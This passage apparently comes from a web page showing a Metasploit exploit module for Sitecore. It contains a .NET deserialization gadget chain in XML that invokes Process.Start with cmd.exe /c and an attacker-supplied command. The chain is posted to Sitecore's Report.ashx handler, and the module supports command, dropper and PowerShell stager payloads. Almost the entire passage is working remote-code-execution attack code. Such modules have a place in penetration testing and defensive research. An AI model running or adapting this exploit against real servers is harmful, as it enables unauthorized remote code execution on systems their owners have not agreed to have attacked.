z:Id="9">System.String</a:targetTypeName><br /> <a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type><br /> </a:delegateEntry><br /> <a:methodName z:Id="11">Start</a:methodName><br /> <a:target i:nil="true"/><br /> <a:targetTypeAssembly z:Id="12">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly><br /> <a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName><br /> <a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type><br /> </Delegate><br /> <method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"<br /> xmlns=""<br /> xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection"><br /> <Name z:Ref="11" i:nil="true"/><br /> <AssemblyName z:Ref="12" i:nil="true"/><br /> <ClassName z:Ref="13" i:nil="true"/><br /> <Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature><br /> <Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2><br /> <MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType><br /> <GenericArguments i:nil="true"/><br /> </method0><br /> <method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"<br /> xmlns=""<br /> xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection"><br /> <Name z:Ref="8" i:nil="true"/><br /> <AssemblyName z:Ref="6" i:nil="true"/><br /> <ClassName z:Ref="9" i:nil="true"/><br /> <Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature><br /> <Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2><br /> <MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType><br /> <GenericArguments i:nil="true"/><br /> </method1><br /> </_comparison><br /> </Comparer><br /> <Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"<br /> xmlns=""><br /> <string z:Id="25"<br /> xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c #{cmd.encode(xml: :text)}</string><br /> <string z:Id="26"<br /> xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd.exe</string><br /> </Items><br /> </ArrayOfstring><br /> </parameter><br /> </parameters>|<br /> end<br /><br /> def exploit<br /> case target['Type']<br /> when :win_cmd<br /> print_status('Executing command payload')<br /> execute_command(payload.encoded)<br /> when :win_dropper<br /> execute_cmdstager<br /> when :psh_stager<br /> execute_command(cmd_psh_payload(<br /> payload.encoded,<br /> payload.arch.first,<br /> remove_comspec: true<br /> ))<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'sitecore', 'shell', 'ClientBin', 'Reporting', 'Report.ashx'),<br /> 'ctype' => 'text/xml',<br /> 'data' => xml_payload(cmd)<br /> )<br /> end<br />end<br /></code></pre>